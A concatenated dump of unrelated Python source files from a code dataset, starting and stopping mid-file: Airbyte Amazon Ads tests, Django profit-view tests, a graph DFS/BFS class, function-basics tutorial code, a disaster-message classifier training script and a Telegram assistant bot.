attribution_report_response, stream_name, report_type):\n # custom start date\n config[\"start_date\"] = \"2022-09-03\"\n\n setup_responses(profiles_response=profiles_response, attribution_report_response=attribution_report_response(report_type))\n\n source = SourceAmazonAds()\n streams = source.streams(config)\n\n profile_stream = get_stream_by_name(streams, \"profiles\")\n attribution_report_stream = get_stream_by_name(streams, stream_name)\n schema = attribution_report_stream.get_json_schema()\n\n profile_records = get_all_stream_records(profile_stream)\n attribution_records = get_all_stream_records(attribution_report_stream)\n assert len(attribution_records) == len(profile_records) * len(json.loads(attribution_report_response(report_type)).get(\"reports\"))\n\n for record in attribution_records:\n validate(schema=schema, instance=record)\n\n\n@pytest.mark.parametrize(\n (\"stream_name\", \"report_type\"),\n [\n (\"attribution_report_products\", \"PRODUCTS\"),\n (\"attribution_report_performance_adgroup\", \"PERFORMANCE_ADGROUP\"),\n (\"attribution_report_performance_campaign\", \"PERFORMANCE_CAMPAIGN\"),\n (\"attribution_report_performance_creative\", \"PERFORMANCE_CREATIVE\"),\n ],\n)\n@responses.activate\ndef test_attribution_report_with_pagination(mocker, config, profiles_response, attribution_report_response, stream_name, report_type):\n profiles = json.loads(profiles_response)\n # use only single profile\n profiles_response = json.dumps([profiles[0]])\n\n setup_responses(profiles_response=profiles_response)\n\n source = SourceAmazonAds()\n streams = source.streams(config)\n\n attribution_report_stream = get_stream_by_name(streams, stream_name)\n attribution_data = json.loads(attribution_report_response(report_type))\n\n def _callback(request: requests.PreparedRequest):\n attribution_data[\"cursorId\"] = None\n request_data = json.loads(request.body)\n\n if request_data[\"count\"] > 0:\n mocker.patch(\"source_amazon_ads.streams.attribution_report.AttributionReport.page_size\", 0)\n attribution_data[\"cursorId\"] = \"next_page_token\"\n\n return 200, {}, json.dumps(attribution_data)\n\n responses.add_callback(\n responses.POST,\n \"https://advertising-api.amazon.com/attribution/report\",\n content_type=\"application/json\",\n callback=_callback,\n )\n\n attribution_records = get_all_stream_records(attribution_report_stream)\n\n # request should be called 2 times for a single profile\n assert len(attribution_records) == 2 * len(attribution_data.get(\"reports\"))\n\n\n@pytest.mark.parametrize(\n (\"stream_name\", \"report_type\"),\n [\n (\"attribution_report_products\", \"PRODUCTS\"),\n (\"attribution_report_performance_adgroup\", \"PERFORMANCE_ADGROUP\"),\n (\"attribution_report_performance_campaign\", \"PERFORMANCE_CAMPAIGN\"),\n (\"attribution_report_performance_creative\", \"PERFORMANCE_CREATIVE\"),\n ],\n)\n@responses.activate\ndef test_attribution_report_no_data(config, profiles_response, attribution_report_bad_response, stream_name, report_type):\n # custom start date\n config[\"start_date\"] = \"2022-09-03\"\n\n setup_responses(profiles_response=profiles_response, attribution_report_response=attribution_report_bad_response)\n\n source = SourceAmazonAds()\n streams = source.streams(config)\n\n attribution_report_stream = get_stream_by_name(streams, stream_name)\n attribution_records = get_all_stream_records(attribution_report_stream)\n assert len(attribution_records) == 0\n","sub_path":"dts/airbyte/airbyte-integrations/connectors/source-amazon-ads/unit_tests/test_attribution_report.py","file_name":"test_attribution_report.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"250787668","text":"import jdatetime\nfrom django.test import TestCase\nfrom django.shortcuts import reverse\nfrom rest_framework import status\nfrom django.conf import settings\nfrom core.tests.factory.factories import UserFactory\nfrom request.models import Xpref, PrefSpec\nfrom request.tests.non_api.factory import factories\nfrom request.helpers import helpers\nfrom request.tests.non_api.factory.base_proformas import BaseProformaFactories\nfrom request.tests.non_api.factory.factories import ProformaFactory\nfrom request.tests.non_api.order import prevent_request_warnings\n\n\nclass TestPublicCost(TestCase):\n\n def setUp(self):\n self.user = UserFactory.create()\n\n def test_prevents_unauth_user_to_get_proforma_profit(self):\n proforma = ProformaFactory.create()\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n self.assertRedirects(\n res,\n expected_url=settings.LOGIN_URL + '?next=' + reverse('prof_profit', kwargs={'ypref_pk': proforma.pk}),\n status_code=status.HTTP_302_FOUND,\n target_status_code=status.HTTP_200_OK,\n )\n\n def test_prevent_unauthorized_user_total_profit(self):\n url = reverse('total_profit')\n res = self.client.get(url)\n self.assertRedirects(\n res,\n expected_url=settings.LOGIN_URL + '?next=' + url,\n status_code=status.HTTP_302_FOUND,\n target_status_code=status.HTTP_200_OK\n )\n\n\nclass PrivateTestCost(TestCase):\n\n def setUp(self):\n self.user = UserFactory.create()\n self.superuser = UserFactory.create(is_superuser=True)\n\n def prepare_prof_routine_not_routine_specs(self):\n date = jdatetime.date(year=1399, month=7, day=15)\n proforma = ProformaFactory.create()\n proforma.date_fa = date\n proforma.save()\n\n factories.ProformaSpecFactory.create(xpref_id=proforma, qty=1, price=160000000, kw=18.5, rpm=3000)\n factories.ProformaSpecFactory.create(xpref_id=proforma, qty=1, price=160000000, kw=2500, rpm=3000)\n\n @prevent_request_warnings\n def test_prevents_user_with_no_permission_to_get_proforma_profit(self):\n self.client.force_login(self.user)\n proforma = ProformaFactory.create()\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n\n @prevent_request_warnings\n def test_superuser_get_proforma_profit(self):\n self.client.force_login(self.user)\n\n proforma = ProformaFactory.create()\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_calculate_proforma_profit(self):\n self.client.force_login(self.superuser)\n\n self.prepare_prof_routine_not_routine_specs()\n proforma = ProformaFactory.create()\n\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n\n self.assertIn('proforma', res.context)\n proforma_result = res.context['proforma']\n self.assertEqual(proforma_result['cost'], 1009281963.20)\n self.assertEqual(round(proforma_result['profit'], 2), 150718036.80)\n self.assertEqual(round(proforma_result['percent'], 2), 14.93)\n\n def test_proforma_profit_path_with_specs(self):\n self.client.force_login(self.superuser)\n self.prepare_prof_routine_not_routine_specs()\n\n proforma = ProformaFactory.create()\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n\n self.assertIn('specs', res.context)\n self.assertTrue(type(res.context['specs']), dict())\n\n self.assertIn('pspecs_with_profit', res.context['specs'])\n self.assertIn('pspecs_no_profit', res.context['specs'])\n specs_profit = res.context['specs']['pspecs_with_profit']\n specs_not_profit = res.context['specs']['pspecs_no_profit']\n kw18 = kw132 = None\n\n for sp in specs_profit:\n if round(sp['power']) == 132:\n kw132 = sp\n elif round(sp['power'], 1) == 18.5:\n kw18 = sp\n self.assertEqual(kw132['power'], 132)\n self.assertEqual(round(kw132['profit'], 1), 120533012.00)\n self.assertEqual(round(kw132['percent'], 2), 13.71)\n self.assertEqual(round(kw18['power'], 1), 18.5)\n self.assertEqual(round(kw18['profit'], 1), 30185024.80)\n self.assertEqual(round(kw18['percent'], 2), 23.25)\n self.assertEqual(len(specs_profit), 2)\n self.assertEqual(len(specs_not_profit), 1)\n\n def test_proforma_profit_path_context_has_proforma_object(self):\n self.client.force_login(self.superuser)\n self.prepare_prof_routine_not_routine_specs()\n proforma = ProformaFactory.create()\n\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n\n self.assertIn('prof', res.context)\n self.assertEqual(res.context['prof'].pk, proforma.pk)\n\n def test_proforma_profit_path_context_has_file_date(self):\n cost_file_name = \"20201002\"\n cost_file_date_fa = helpers.get_date_fa_from_file_name(cost_file_name)\n self.client.force_login(self.superuser)\n self.prepare_prof_routine_not_routine_specs()\n proforma = ProformaFactory.create()\n\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n\n self.assertIn('cost_file', res.context)\n self.assertIn('name', res.context['cost_file'])\n self.assertIn('date_fa', res.context['cost_file'])\n self.assertEqual(res.context['cost_file']['name'], cost_file_name)\n self.assertEqual(res.context['cost_file']['date_fa'], cost_file_date_fa)\n\n def test_prof_profit_post_discount(self):\n self.client.force_login(self.superuser)\n prof = factories.ProformaFactory.create(number=153)\n factories.ProformaSpecFactory.create(xpref_id=prof, price=1000000000, kw=132, rpm=1500, qty=3)\n factories.ProformaSpecFactory.create(xpref_id=prof, price=500000000, kw=90, rpm=1500, qty=2)\n url = reverse('prof_profit', kwargs={'ypref_pk': prof.pk})\n post_data = {\n 'un90_disc': 10,\n 'up90_disc': 15\n }\n res = self.client.post(url, data=post_data)\n discount = {\n 'lte__90': 10,\n 'gt__90': 15,\n }\n self.assertIn('discount', res.context)\n self.assertDictEqual(res.context['discount'], discount)\n self.assertEqual(res.context['proforma']['price'], 3450000000)\n\n def test_materials_cost_for_prof_profit(self):\n self.client.force_login(self.superuser)\n proforma = ProformaFactory.create()\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n self.assertIn('material_cost', res.context)\n self.assertEqual(res.context['material_cost']['silicon'], 330000)\n self.assertEqual(res.context['material_cost']['cu'], 2100000)\n self.assertEqual(res.context['material_cost']['dicast'], 220000)\n self.assertEqual(res.context['material_cost']['steel'], 150000)\n self.assertEqual(res.context['material_cost']['alu'], 500000)\n\n def test_adjust_materials_cost_prof_profit_post(self):\n proforma = ProformaFactory.create()\n self.client.force_login(self.superuser)\n self.prepare_prof_routine_not_routine_specs()\n discount_payload = {\n 'lte__90': 0,\n 'gt__90': 0,\n }\n materials_payload = {\n \"silicon\": \"300,000\",\n \"cu\": \"210,000,0\",\n \"alu\": \"500,000\",\n \"steel\": \"150,000\",\n \"dicast\": \"220,000\",\n }\n materials_payload = {\n \"silicon\": 300000,\n \"cu\": 2100000,\n \"alu\": 500000,\n \"steel\": 150000,\n \"dicast\": 220000,\n }\n payload = dict()\n payload.update(discount_payload)\n payload.update(materials_payload)\n\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.post(url, data=payload)\n\n self.assertDictEqual(res.context['material_cost'], materials_payload)\n\n specs_profit = res.context['specs']['pspecs_with_profit']\n specs_not_profit = res.context['specs']['pspecs_no_profit']\n kw18 = kw132 = None\n\n for sp in specs_profit:\n if round(sp['power']) == 132:\n kw132 = sp\n elif round(sp['power'], 1) == 18.5:\n kw18 = sp\n self.assertEqual(kw132['power'], 132)\n self.assertEqual(round(kw132['profit'], 1), 146069012.00)\n self.assertEqual(round(kw132['percent'], 2), 17.11)\n self.assertEqual(round(kw18['power'], 1), 18.5)\n self.assertEqual(round(kw18['profit'], 1), 33410624.80)\n self.assertEqual(round(kw18['percent'], 2), 26.39)\n self.assertEqual(len(specs_profit), 2)\n self.assertEqual(len(specs_not_profit), 1)\n\n def test_current_profit_sets_today_in_session(self):\n proforma = ProformaFactory.create()\n self.client.force_login(self.superuser)\n\n today = jdatetime.date.today()\n\n url = reverse('current_profit', kwargs={'ypref_pk': proforma.pk})\n response = self.client.get(url)\n self.assertEqual(\n self.client.session.get('current_profit_date'),\n str(today)\n )\n self.assertRedirects(\n response=response,\n expected_url=reverse('prof_profit', kwargs={'ypref_pk': proforma.pk}),\n status_code=status.HTTP_302_FOUND,\n target_status_code=status.HTTP_200_OK\n )\n\n def test_current_profit_picks_today_date(self):\n self.client.force_login(self.superuser)\n\n prof_date = jdatetime.date(year=1399, month=3, day=6) # file: 1399-02-14:20200503\n proforma = ProformaFactory.create()\n proforma.date_fa = prof_date\n proforma.save()\n\n today = jdatetime.date.today()\n\n session = self.client.session\n session.update({\n 'current_profit_date': str(today),\n })\n session.save()\n\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n response = self.client.get(url)\n self.assertEqual(response.context['prof'].date_fa, proforma.date_fa)\n self.assertNotIn('current_profit_date', self.client.session)\n self.assertEqual(response.context['prof'], proforma)\n self.assertEqual(response.context['cost_file']['name'], \"20201102\")\n\n @prevent_request_warnings\n def test_total_profit_fails_no_permission(self):\n url = reverse('total_profit')\n self.client.force_login(self.user)\n res = self.client.get(url)\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n\n @prevent_request_warnings\n def test_total_profit_fails_with_exp_user(self):\n self.client.force_login(self.user)\n url = reverse('total_profit')\n res = self.client.get(url)\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_total_profit_success_with_superuser(self):\n self.client.force_login(self.superuser)\n url = reverse('total_profit')\n res = self.client.get(url)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n def test_perms(self):\n self.client.force_login(self.superuser)\n PrefSpec.objects.all().delete()\n Xpref.objects.all().delete()\n\n BaseProformaFactories().base_proformas()\n\n url = reverse('total_profit')\n response = self.client.get(url)\n self.assertEqual(response.context['proforma_count'], 0)\n self.assertEqual(round(response.context['cost'], 2), 0)\n self.assertEqual(round(response.context['price'], 2), 0)\n self.assertEqual(round(response.context['profit'], 2), 0)\n self.assertEqual(response.context['percent'], None)\n\n def test_total_profit(self):\n self.client.force_login(self.superuser)\n PrefSpec.objects.all().delete()\n Xpref.objects.all().delete()\n\n BaseProformaFactories().base_proformas()\n Xpref.objects.update(perm=True)\n\n prof1 = factories.ProformaFactory.create(number=155)\n date_str = '20201014'\n date = helpers.get_date_from_date_str(date_str)\n date_fa = jdatetime.date.fromgregorian(date=date, locale='fa_IR')\n prof1.date_fa = date_fa\n prof1.perm = False\n prof1.save()\n factories.ProformaSpecFactory.create(xpref_id=prof1, price=160000000, kw=18.5, rpm=3000, qty=1)\n factories.ProformaSpecFactory.create(xpref_id=prof1, price=1000000000, kw=132, rpm=1500, qty=2)\n\n url = reverse('total_profit')\n response = self.client.get(url)\n self.assertIn('cost', response.context)\n self.assertIn('price', response.context)\n self.assertIn('profit', response.context)\n self.assertIn('percent', response.context)\n\n self.assertEqual(response.context['proforma_count'], 3)\n self.assertEqual(round(response.context['cost'], 2), 4784590556.00)\n self.assertEqual(round(response.context['price'], 2), 5400000000.00)\n self.assertEqual(round(response.context['profit'], 2), 615409444.00)\n self.assertEqual(round(response.context['percent'], 2), 12.86)\n","sub_path":"app/request/tests/non_api/cost/test_cost.py","file_name":"test_cost.py","file_ext":"py","file_size_in_byte":13507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"537618176","text":"from stack_array import * # Needed for Depth First Search\nfrom queue_array import * # Needed for Breadth First Search\n\n\nclass Vertex:\n '''Add additional helper methods if necessary.'''\n def __init__(self, key):\n '''Add other attributes as necessary'''\n self.id = key\n self.adjacent_to = []\n self.flag = False\n self.rb = \"red\"\n\n def add_adj(self, vertex):\n self.adjacent_to.append(vertex)\n\n def get_adj(self):\n return self.adjacent_to\n\n def get_flag(self):\n return self.flag\n\n def set_flag(self, tf):\n self.flag = tf\n\n def set_rb(self, rb):\n self.rb = rb\n\n def get_rb(self):\n return self.rb\n\n\nclass Graph:\n '''Add additional helper methods if necessary.'''\n def __init__(self, filename):\n '''reads in the specification of a graph and creates a graph using an adjacency list representation. \n You may assume the graph is not empty and is a correct specification. E.g. each edge is \n represented by a pair of vertices. Note that the graph is not directed so each edge specified \n in the input file should appear on the adjacency list of each vertex of the two vertices associated \n with the edge.'''\n self.graph = {}\n\n specs = open(filename, \"r\")\n data = specs.read()\n specs.close()\n\n lines = data.split(\"\\n\")\n for line in lines:\n words = line.split(\" \")\n\n for k in range(len(words)):\n if words[k] != \"\":\n self.add_vertex(words[k])\n\n if k % 2 == 1:\n self.add_edge(words[0], words[1])\n\n def add_vertex(self, key):\n '''Add vertex to graph, only if the vertex is not already in the graph.'''\n if key not in self.graph:\n vertex = Vertex(key)\n self.graph[key] = vertex\n\n def get_vertex(self, key):\n '''Return the Vertex object associated with the id. If id is not in the graph, return None'''\n if key in self.graph:\n return self.graph[key]\n else:\n return None\n\n def add_edge(self, v1, v2):\n '''v1 and v2 are vertex id's. As this is an undirected graph, add an \n edge from v1 to v2 and an edge from v2 to v1. You can assume that\n v1 and v2 are already in the graph'''\n self.get_vertex(v1).add_adj(v2)\n self.get_vertex(v2).add_adj(v1)\n\n def get_vertices(self):\n '''Returns a list of id's representing the vertices in the graph, in ascending order'''\n sort_keys = sorted(self.graph)\n return sort_keys\n\n def conn_components(self): \n '''Returns a list of lists. For example, if there are three connected components \n then you will return a list of three lists. Each sub list will contain the \n vertices (in ascending order) in the connected component represented by that list.\n The overall list will also be in ascending order based on the first item of each sublist.\n This method MUST use Depth First Search logic!'''\n\n self.set_false()\n\n stack = Stack(len(self.graph))\n comp_tot = []\n\n for i in self.graph:\n if not self.get_vertex(i).get_flag():\n stack.push(i)\n self.get_vertex(i).set_flag(True)\n comp_tot.append(sorted(self.conn_helper(stack, [], i)))\n\n return sorted(comp_tot)\n\n def conn_helper(self, stack, compound, temp):\n\n compound.append(temp)\n\n while not stack.is_empty():\n for k in self.graph[temp].get_adj():\n\n if not self.graph[k].get_flag():\n self.get_vertex(k).set_flag(True)\n stack.push(k)\n self.conn_helper(stack, compound, k)\n\n if not stack.is_empty():\n stack.pop()\n\n return compound\n\n def set_false(self):\n for i in self.graph:\n self.get_vertex(i).set_flag(False)\n\n def is_bipartite(self):\n '''Returns True if the graph is bicolorable and False otherwise.\n This method MUST use Breadth First Search logic!'''\n\n self.set_false()\n\n queue = Queue(len(self.graph))\n temp_flag = True\n\n for i in self.graph:\n if not self.get_vertex(i).get_flag():\n self.get_vertex(i).set_rb(\"black\")\n self.get_vertex(i).set_flag(True)\n queue.enqueue(i)\n temp_flag = self.bipart_helper(queue)\n\n if not temp_flag:\n break\n\n return temp_flag\n\n def bipart_helper(self, queue):\n\n ef = True\n\n while not queue.is_empty():\n temp = queue.dequeue()\n temp_l = self.graph[temp].get_adj()\n\n for i in temp_l:\n if not self.graph[i].get_flag():\n self.graph[i].set_flag(True)\n queue.enqueue(i)\n\n if self.graph[temp].get_rb() == \"black\":\n self.graph[i].set_rb(\"red\")\n else:\n self.graph[i].set_rb(\"black\")\n\n elif self.graph[temp].get_rb() == self.graph[i].get_rb():\n ef = False\n\n if not ef:\n break\n\n return ef\n","sub_path":"p5-hegglinmichael/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"173550717","text":"def evenOdd (x):\r\n if x % 2 == 0:\r\n print('even')\r\n else:\r\n print('odd')\r\n\r\n# driver code\r\nevenOdd(53)\r\nevenOdd(12)\r\n\r\n#%% Pass by reference \r\n'''\r\nin Python every variable name is a reference. \r\nWhen we pass a variable to a function, a new reference to the object is created.\r\n'''\r\ndef myFun(x):\r\n x[0] = 20\r\n \r\n# Driver Code (Note that lst is modified \r\n# after function call. \r\nlst = [10, 11, 12, 13, 14, 15] \r\nmyFun(lst); \r\nprint(lst)\r\n\r\n#%%\r\ndef myFun(x): \r\n \r\n # After below line link of x with previous \r\n # object gets broken. A new object is assigned \r\n # to x. \r\n x = [20, 30, 40] \r\n \r\n# Driver Code (Note that lst is not modified \r\n# after function call. \r\nlst = [10, 11, 12, 13, 14, 15] \r\nmyFun(lst); \r\nprint(lst) \r\n\r\n#%%\r\ndef myFun(x): \r\n \r\n # After below line link of x with previous \r\n # object gets broken. A new object is assigned \r\n # to x. \r\n x = 20\r\n \r\n# Driver Code (Note that lst is not modified \r\n# after function call. \r\nx = 10 \r\nmyFun(x); \r\nprint(x)\r\n\r\n#%% SWAP -------\r\n\r\ndef swap(x,y):\r\n temp = x\r\n x = y;\r\n y = temp\r\n \r\n#DRiver code \r\nx = 2; y = 3\r\nswap(x,y)\r\nprint(x); print(y)\r\n\r\n#%% default argument\r\n'''\r\nonce we have a default argument, all the arguments to its \r\nright must also have default values.'''\r\n\r\ndef myFun(x, y=50): \r\n print(\"x: \", x) \r\n print(\"y: \", y) \r\n \r\n# Driver code (We call myFun() with only \r\n# argument) \r\nmyFun(10)\r\n\r\n#%% keyword Arguments\r\ndef student(firstname, lastname):\r\n print(firstname, lastname)\r\n\r\n\r\n# Keyword arguments \r\nstudent(firstname ='Geeks', lastname ='Practice') \r\nstudent(lastname ='Practice', firstname ='Geeks')\r\n\r\n#%% Variable Length arguments\r\n# *args for variable number of arguments \r\n\r\ndef myFun(*argv):\r\n for arg in argv:\r\n print(arg)\r\n \r\nmyFun('Hello', 'Welcome', 'to', 'GeeksforGeeks') \r\n\r\n#%% \r\n## *kargs for variable number of keyword arguments\r\n\r\ndef myFun(**kwargs): \r\n for key, value in kwargs.items(): \r\n print (\"%s == %s\" %(key, value)) \r\n \r\n# Driver code \r\nmyFun(first ='Geeks', mid ='for', last='Geeks')\r\n\r\n#%%\r\n# lambda is used to create anonymous functions\r\n\r\ncube = lambda x : x*x*x\r\nprint(cube(7))\r\n\r\n \r\n \r\n","sub_path":"Programming_basics/7_Functions/Ex1_basics.py","file_name":"Ex1_basics.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"483429813","text":"import sys\nimport numpy as np\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.metrics import fbeta_score, make_scorer\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.multioutput import MultiOutputClassifier\nimport pickle\nimport nltk\nnltk.download('punkt')\nnltk.download('wordnet')\nfrom typing import Tuple, List\n\n\ndef load_data(database_filepath: str) -> Tuple[pd.DataFrame, pd.DataFrame, List[str]]:\n \"\"\" Function to load the database into pandas DataFrame\n Args: database_filepath: Path for the database\n database_filename: Name for the database\n Returns: X: features (messages)\n y: categories\n An ordered list of categories\n \"\"\"\n # Loading database into pandas DataFrame\n \n engine = create_engine('sqlite:///{}'.format(database_filepath))\n df = pd.read_sql(\"SELECT * FROM disaster\", engine)\n\n # Creating DataFrame for x variables\n X = df['message']\n\n # Creating DataFrame for y variables\n y = df.drop(['id', 'message', 'original', 'genre'], axis=1).astype(float)\n categories = y.columns.values\n return X, y, categories \n\n\ndef tokenize(text: str) -> List[str]:\n \"\"\" Function to tokenize text\n Args: Text\n Returns: List of tokens\n \"\"\"\n tokens = nltk.word_tokenize(text)\n lemmatizer = nltk.WordNetLemmatizer()\n return [lemmatizer.lemmatize(w).lower().strip() for w in tokens]\n\n\ndef build_model()->GridSearchCV:\n \"\"\" Function to build pipeline and GridSearch\n Args: None\n Returns: Model\n \"\"\"\n # Pipeline for transforming data, fitting to model and predict the model\n pipeline = Pipeline([\n ('cvect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', RandomForestClassifier())\n ])\n\n # Parameters for GridSearch \n parameters = {\n 'clf__n_estimators': [20, 40, 60],\n 'clf__max_depth': [5, 10, None],\n 'clf__max_samples_leaf': [2, 4, 5],\n 'clf__max_samples_split': [2, 5, 10],\n }\n\n # GridSearch with parameters above\n cv = GridSearchCV(pipeline, param_grid = parameters, scoring='f1_micro', verbose=1, n_jobs=1)\n\n return pipeline\n\n\ndef evaluate_model(model: GridSearchCV, X_test: pd.DataFrame, y_test: pd.DataFrame, category_names: List)->None:\n \"\"\" Function to evaluate model by printing a classification report\n\n Args: model, features, labels to evaluate, and a list of categories\n Returns: Classification report\n \"\"\"\n y_pred = model.predict(X_test)\n print(classification_report(y_test, y_pred, target_names=category_names)) \n \n\n\n\ndef save_model(model: GridSearchCV, model_filepath: str)-> None:\n \"\"\" Function to save the model as pickle file\n Args: Model, filepath\n Returns: None\n \"\"\"\n with open(model_filepath, 'wb') as file:\n pickle.dump(model, file)\n \n\ndef main():\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n\n X, y, category_names = load_data(database_filepath)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\n print('Building model...')\n model = build_model()\n\n print('Training model...')\n model.fit(X_train, y_train)\n\n print('Evaluating model...')\n evaluate_model(model, X_test, y_test, category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, model_filepath)\n\n print('Trained model saved!')\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\n\n\nif __name__ == '__main__':\n main()","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"303361812","text":"# -*- coding: utf-8 -*-\nfrom app import app\nfrom app.config import token #Забираем токен из config.py (Этот файл содержит переменную token c занчением, выдаваемым botfather в telegram)\nfrom app.db_postgresql import SQL_Postgre\nfrom app.csvEditor import csv_dict_reader\nfrom app.ExchangeRates import current_exchange_rate\nimport os\nimport telebot\nfrom flask import request\nfrom app.timezone import get_utc_offset_timezone, get_time_from_another_timezone\nimport requests\nimport datetime\nimport time\nimport threading\n\n\nbot = telebot.TeleBot(token)\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n # Можно так\n # user = bot.get_me().__dict__['first_name']\n # Или так\n botName = bot.get_me().first_name # Берем имя бота\n userName = message.from_user.first_name # Берем имя пользователя\n chat_id = message.chat.id\n # Приветсвие\n\n\n\n '''\n Валидация клиента в системе\n '''\n\n # Получаем данные\n userId = message.from_user.id # id пользователя в telegram\n # Являетеся ли ботом? В документации есть is_bot\n firstName = message.from_user.first_name # Имя пользователя\n userName = message.from_user.username # Имя, отображающееся в telegram\n lastName = message.from_user.last_name # Фамилия пользователя\n languageCode = message.from_user.language_code # Используемый язык\n msg_date = message.date #Дата отправки /start\n\n\n db = SQL_Postgre()\n # check_user_availible = True - Пользователь существует в системе\n # = False - Пользователь не существует в системе\n check_user_availible = db.check_user_id(userId)\n if check_user_availible == False:\n curr_utc_time = datetime.datetime.utcnow()\n timezone = get_utc_offset_timezone(curr_utc_time, msg_date)\n a = db.new_user(userId,firstName,userName,lastName,timezone)\n db.close()\n # После регистрации клиента в системе выводим первое приветсвие\n bot.send_message(message.chat.id, userName + \", Приветствую! Меня зовут \" + botName + \". Я ваша персональная помощница.\\nПодпишитесь на мои сервисы и каждое утро вы будете получать уведомления.\")\n list_subscriptions = \"Чтобы подписаться на сервис, нажмите на него или напишите мне: \\n/time - дата и время\\n/weather - погода на сегодня\\n/currency - курс валют\\n/contact - уведомления о днях рождения\"\n bot.send_message(message.chat.id, list_subscriptions)\n list_commands = \"Также вы можете воспользоваться командами: \\n/time - Текущее время\\n/contacts - Управление контактами\\n/currency - курс валют\"\n bot.send_message(message.chat.id, list_commands)\n\n else:\n db.close()\n bot.send_message(message.chat.id, userName + \", Приветствую! Меня зовут \" + botName + \". Чем я могу помочь?\")\n list_subscriptions = \"/currentSubscriptions - текущие подписки\"\n bot.send_message(message.chat.id, list_subscriptions)\n list_commands = \"Список команд: \\n/time - Текущее время\\n/contacts - Управление контактами\\n/currency - курс валют\"\n bot.send_message(message.chat.id, list_commands)\n\n\n@bot.message_handler(commands=['time'])\ndef send_time_now(message):\n currDTime = datetime.datetime.fromtimestamp(message.date)\n bot.send_message(message.chat.id, 'Сегодня {:%d %b %Y, %H:%M } '.format(currDTime))\n\n@bot.message_handler(commands=['contacts'])\ndef send_welcome_contacts(message):\n bot.send_message(message.chat.id, \"Список команд:\\n /createContact - Загрузить контакты файлом\")\n\n@bot.message_handler(func=lambda message: True, commands=['createContact'])\ndef new_contact_list(message):\n bot.send_message(message.chat.id, 'Пожалуйста, загрузите файл в формате GOOGLE CSV\\nПодробнее: https://www.google.com/contacts/u/0/?cplus=0#contacts\\nЕще->Экспорт->Выберите формат файла для экспорта->\\\n Google CSV (для импорта в аккаунт Google)')\n\n# Загрузка документа\n@bot.message_handler(content_types=['document'])\ndef downloadFile(message):\n userId = message.from_user.id\n a = message.document.file_id\n file_info = bot.get_file(a)\n file = requests.get('https://api.telegram.org/file/bot{0}/{1}'.format(token, file_info.file_path))\n csv_dict_reader(file.text, userId)\n bot.send_message(message.chat.id, \"Файл успешно загружен.\")\n\n@bot.message_handler(commands=['currency'])\ndef send_exchange_rates(message):\n dollar,euro = current_exchange_rate()\n bot.send_message(message.chat.id, \"Курс валют на сегодня:\\n USD: \" + str(dollar) +\"\\n EUR: \" + str(euro))\n\n\ndef start_contact_notification():\n thread = threading.Thread(target=run_thread)\n thread.start()\n\n\ndef run_thread():\n time_notice_h = 9 # Уведомления статически приходят пользователю в 9 утра 0 минут\n time_notice_m = 0 # 0 минут\n while True:\n current_date = datetime.date.today() # Узнаем текущую дату\n current_time = datetime.datetime.utcnow() # Узнаем текущee время сервера по поясу UTC (+00 на сервере)\n for utc in range(-12,12): # пробегаемся по всем часовым поясам\n if current_time.hour + utc == time_notice_h and current_time.minute == time_notice_m: # Уведомление пока настроено статически на 9 утра 0 минут (Но если загрузим на серевер, то он будет будет присылать в 9 утра по времени сервера)\n '''\n Например: Пользователь находится в Москве. Его часовой пояс мы получили при запуске команды /start (Первый запуск бота). Его UTC равен +3\n Время сервера current_time.hour = 6 часов утра\n Время клиента 9 часов утра\n если время сервера + часовой пояс клиента == 9 утра 0 минут, то выполняем дальше\n '''\n db = SQL_Postgre()\n data_contact_withTimeZone = db.get_user_timezone(utc) # Получаем id-шники тех, у кого часовой пояс utc\n for currData in data_contact_withTimeZone:\n data_contact = db.find_data_contact(current_date.month, current_date.day, currData[0]) # Получаем данные контактов с указаными 